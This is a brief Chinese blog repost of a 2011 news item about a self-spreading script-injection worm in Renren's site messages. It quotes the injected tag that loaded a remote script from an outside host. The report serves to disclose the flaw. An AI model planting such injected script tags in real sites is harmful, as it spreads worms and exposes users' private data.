人人网站内信安全漏洞导致用户隐私泄露
摘要:
这也算是人才了吧,可惜服务器依然挂了来源:http://internet.solidot.org/article.pl?sid=11/04/29/1527233yangzhe1991写道 "4月29日晚,大量人人网用户收到一个标题为《有人暗恋你哦,你想知道TA是谁么》的站内信,用户发现若打开此站内信将会自动将此站内信内容发给所有好友。通过查看站内信网页源码,发现其中有一行代码为<script src='http://qiutuan.net/2011/51.js'>。显然,一个稍微有点网站编程常识的人都知道“<>”一类标签符号在显示的时候需要转义 阅读全文
posted @ 2011-04-30 04:39 大宝pku 阅读(1703) 评论(0) 推荐(0) 编辑
